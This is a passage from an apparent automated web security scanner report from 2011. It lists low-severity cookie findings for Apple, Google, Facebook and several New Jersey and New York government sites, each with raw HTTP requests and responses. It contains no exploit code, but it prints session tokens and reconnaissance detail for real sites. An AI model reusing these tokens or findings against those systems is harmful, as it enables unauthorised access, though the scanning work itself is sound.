Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 13 Jul 2011 11:39:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

6.9. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=0UnL/zxOv1wWLvbsWR94vThVNFRL+VrVChrGyouncnHM3RJMc0OunWy9Iw1KYllglK6BzBYmmP70PPXySvjQrQRr7GhCttd/4huailsTJ8NIePwbCOJO2s7gpkApsymcrQnuHMcKstsMu0BAp1qc7xTgnAIN4iuUF5uw2M1rmo/cllWpet7twXmFAr3zg+2zFmCpTKJ/akdqFozM2Gjavk0dnS0dTqHcwjhvleYzL+SBU6hOq7l+aI8afJDgyTfi7XAB/bP9nrhTwK/nD4N6oH+g6IXrGspDRaXHbWEnya2CdRbitwUAtHcIjU1Uy5SR3pQDqqo7XI+jv41vcgvf0vRB4oKWRzS/hHLY0NCMW04UQMf2u2g9SSm5FZWpIpUI58iDq78i5bp7fZPd4Et8ZmFkCYxUkLx42YrXu0T9nOJyJl07nB844YaoEMKgvSvUPM2ss+jIv8YjICsWlytE2sSVlw0DBNEA9uL1Pe1k1m41bpjryqDOi8vgtW4HelOL1Hum8RiUvIoGMlmherfTe6RUfzSCpPmpK/MxiAMWnGtjVcb/o4TlyMiqxsde+eBU; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=546
Expires: Wed, 13 Jul 2011 02:08:44 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=0UnL/zxOv1wWLvbsWR94vThVNFRL+VrVChrGyouncnHM3RJMc0OunWy9Iw1KYllglK6BzBYmmP70PPXySvjQrQRr7GhCttd/4huailsTJ8NIePwbCOJO2s7gpkApsymcrQnuHMcKstsMu0BAp1qc7xTgnAIN4iuUF5uw2M1rmo/cllWpet7twXmFAr3zg+2zFmCpTKJ/akdqFozM2Gjavk0dnS0dTqHcwjhvleYzL+SBU6hOq7l+aI8afJDgyTfi7XAB/bP9nrhTwK/nD4N6oH+g6IXrGspDRaXHbWEnya2CdRbitwUAtHcIjU1Uy5SR3pQDqqo7XI+jv41vcgvf0vRB4oKWRzS/hHLY0NCMW04UQMf2u2g9SSm5FZWpIpUI58iDq78i5bp7fZPd4Et8ZmFkCYxUkLx42YrXu0T9nOJyJl07nB844YaoEMKgvSvUPM2ss+jIv8YjICsWlytE2sSVlw0DBNEA9uL1Pe1k1m41bpjryqDOi8vgtW4HelOL1Hum8RiUvIoGMlmherfTe6RUfzSCpPmpK/MxiAMWnGtjVcb/o4TlyMiqxsde+eBU; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

6.10. http://images.apple.com/ipod/images/gradient_texture20100901.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=wj1HqN0mf/88OaLzQaD2+dQLJRv8wdQHGvAl27D3twW/DxLqTJXahfgnbRGYoUOIKVBrIsfTyWmD+LeXVMkGZjreOV1XSiLWfQeToJiTN6/MP3ur9Fk+TLxUgCNGFqsm0ZH5uwqmzOR8OhHqQfWbXUa6ID4j4T2NC1X5iaDLigBhjzpNUF26WY72wPWbQp01HaSDNytaSod4G6It8FL0wN0152nDp/eHRDA81nhZL1wGrH6EyYBx4JodHgeAGHwNG76mnLxDNL7N8yeHw9ruwTZo1BuDBRfuH56WwFbdWzua9s8v5vqECPNa9oUpkUBb6YqGJYwwkdE6+V7mA4WkVPb31Fq0C8p31qhe1R+J4C5HoU7gZJycSFtDWzk8tS8JPzj5y4L7gxdAMfYh+zqkixXLx4YQi3WQLtAF15r2hAeef5mgYJExuQrg9s9hEueOHUS2apbL1IFPdihDoGHvCpo9dvGEWwMuhkDyEP0Kn81boO+m3ZhOwGX8JkfKNQHxl14p2YTLx3k2YVZ266qYhbKlMbAWmvKCzb3BH0c587Zb9ZwzTFqLw6mE3pfCjadj; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "a9a-48f2afe054800"
If-Modified-Since: Wed, 01 Sep 2010 04:18:40 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Cache-Control: max-age=418
Expires: Wed, 13 Jul 2011 02:06:36 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Set-Cookie: ccl=wj1HqN0mf/88OaLzQaD2+dQLJRv8wdQHGvAl27D3twW/DxLqTJXahfgnbRGYoUOIKVBrIsfTyWmD+LeXVMkGZjreOV1XSiLWfQeToJiTN6/MP3ur9Fk+TLxUgCNGFqsm0ZH5uwqmzOR8OhHqQfWbXUa6ID4j4T2NC1X5iaDLigBhjzpNUF26WY72wPWbQp01HaSDNytaSod4G6It8FL0wN0152nDp/eHRDA81nhZL1wGrH6EyYBx4JodHgeAGHwNG76mnLxDNL7N8yeHw9ruwTZo1BuDBRfuH56WwFbdWzua9s8v5vqECPNa9oUpkUBb6YqGJYwwkdE6+V7mA4WkVPb31Fq0C8p31qhe1R+J4C5HoU7gZJycSFtDWzk8tS8JPzj5y4L7gxdAMfYh+zqkixXLx4YQi3WQLtAF15r2hAeef5mgYJExuQrg9s9hEueOHUS2apbL1IFPdihDoGHvCpo9dvGEWwMuhkDyEP0Kn81boO+m3ZhOwGX8JkfKNQHxl14p2YTLx3k2YVZ266qYhbKlMbAWmvKCzb3BH0c587Zb9ZwzTFqLw6mE3pfCjadj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

6.11. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.12. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.13. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

6.14. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.15. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.16. http://www.facebook.com/NewJerseyLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/NewJerseyLottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
lsd=pn98H; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=pn98H; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.42
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 34241

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

6.17. http://www.facebook.com/feeds/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=JPocTlXdVySIX-Z4nYzhuuHn; expires=Fri, 12-Jul-2013 01:51:32 GMT; path=/; domain=.facebook.com; httponly
lsd=-8Odz; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /feeds/page.php?id=147895761925432&format=rss20 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-type: application/rss+xml
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Tue, 12 Jul 2011 17:29:20 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=JPocTlXdVySIX-Z4nYzhuuHn; expires=Fri, 12-Jul-2013 01:51:32 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=-8Odz; path=/; domain=.facebook.com
X-FB-Server: 10.54.156.43
Connection: close
Date: Wed, 13 Jul 2011 01:51:32 GMT
Content-Length: 37858

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
xmlns:media="http://search.yahoo.com/mrss/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>New Jersey Lo
...[SNIP]...

6.18. http://www.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=19674e168110c698:U=17ea5243225a615b:FF=0:TM=1308589662:LM=1310521893:S=z4pmIJAj-KHt9ejB; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:FF=0:TM=1308589662:LM=1310521893:S=z4pmIJAj-KHt9ejB; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a
...[SNIP]...

6.19. http://www.google.com/reviews/scripts/annotations_bootstrap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/reviews/scripts/annotations_bootstrap.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521893:S=5yFQy_JU0BcdCdTy; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521893:S=5yFQy_JU0BcdCdTy; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Wed, 13 Jul 2011 01:51:33 GMT
Server: zfe
X-XSS-Protection: 1; mode=block
Connection: close

(function(){
window['google'] = window['google'] || {};
window['google']['annotations'] = window['google']['annotations'] || {};
if (!window['google']['annotations']['loaded']) {
window['google']['an
...[SNIP]...

6.20. http://www.youtube.com/NewJerseyGovernment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/NewJerseyGovernment

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.21. http://www.youtube.com/newjerseylottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/newjerseylottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7. Cookie without HttpOnly flag set previous next
There are 59 instances of this issue:

http://brothercake.com/site/resources/scripts/onload/
http://gillibrand.senate.gov/
http://iapps.courts.state.ny.us/webcivil/ecourtsMain
http://schumer.senate.gov/
http://visitnj.org/
http://www.benjaminsterling.com/experiments/jqShuffle/
http://www.cio.ny.gov/universal_broadband
http://www.cs.state.ny.us/
https://www.mybenefits.ny.gov/
http://www.njleg.state.nj.us/
http://www.njleg.state.nj.us/Default.asp
http://www.nydoctorprofile.com/welcome.jsp
http://www.opensource.org/licenses/gpl-3.0.html
http://www.opensource.org/licenses/mit-license.php
http://www.otda.state.ny.us/main/workingfamilies/default.asp
http://www.visitnj.org/events
http://www.visitnj.org/new-jerseys-wineries
https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp
https://www6.state.nj.us/LOT_LVC/LogAndLoad
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp
http://511ny.org/
http://ads.doclix.com/adserver/serve/js/banner_unit.jsp
http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/ipod/images/gradient_texture20100901.jpg
http://israel.house.gov/
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
https://market.android.com/reviews/components
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
http://sdc.state.nj.us/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif
http://server.iad.liveperson.net/hc/33511087/
http://server.iad.liveperson.net/hc/33511087/
http://server.iad.liveperson.net/hc/33511087/x.js
http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.facebook.com/feeds/page.php
http://www.google.com/
http://www.google.com/reviews/scripts/annotations_bootstrap.js
http://www.governor.ny.gov/
http://www.iloveny.com/
http://www.louise.house.gov/
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
http://www.nylottery.org/index.php
http://www.recovery.ny.gov/
http://www.youtube.com/NewJerseyGovernment
http://www.youtube.com/newjerseylottery

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

7.1. http://brothercake.com/site/resources/scripts/onload/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://brothercake.com
Path:	/site/resources/scripts/onload/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=0f9d7399c64f0eda356a3e3cb4ab4659; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/resources/scripts/onload/ HTTP/1.1
Host: brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
Set-Cookie: PHPSESSID=0f9d7399c64f0eda356a3e3cb4ab4659; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta htt
...[SNIP]...

7.2. http://gillibrand.senate.gov/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://gillibrand.senate.gov
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=96178972;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/
CFTOKEN=29227467;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: gillibrand.senate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:45 GMT
Server: Apache
Set-Cookie: CFID=96178972;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/
Set-Cookie: CFTOKEN=29227467;expires=Fri, 05-Jul-2041 01:53:08 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_efgbvmu=ffffffffc3a01b5745525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 28271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><ht
...[SNIP]...

7.3. http://iapps.courts.state.ny.us/webcivil/ecourtsMain previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://iapps.courts.state.ny.us
Path:	/webcivil/ecourtsMain

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=D636678843A73841A17417BB6EA6327A.server26154; Path=/webcivil
TS9291af=ea95e8d9d89fc909cf6e92131f35ea589037abba2ec9e5cc4e1cfa48; Path=/
TS2942a5=1c8ac255b8964f2872b59e174560f4a89037abba2ec9e5cc4e1cfa4860ac0ec51d94d266; Path=/webcivil

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webcivil/ecourtsMain HTTP/1.1
Host: iapps.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:08 GMT
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=D636678843A73841A17417BB6EA6327A.server26154; Path=/webcivil
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 20060
Connection: close
Set-Cookie: TS9291af=ea95e8d9d89fc909cf6e92131f35ea589037abba2ec9e5cc4e1cfa48; Path=/
Set-Cookie: TS2942a5=1c8ac255b8964f2872b59e174560f4a89037abba2ec9e5cc4e1cfa4860ac0ec51d94d266; Path=/webcivil

<html>
<head>
<title>eCourts</title>
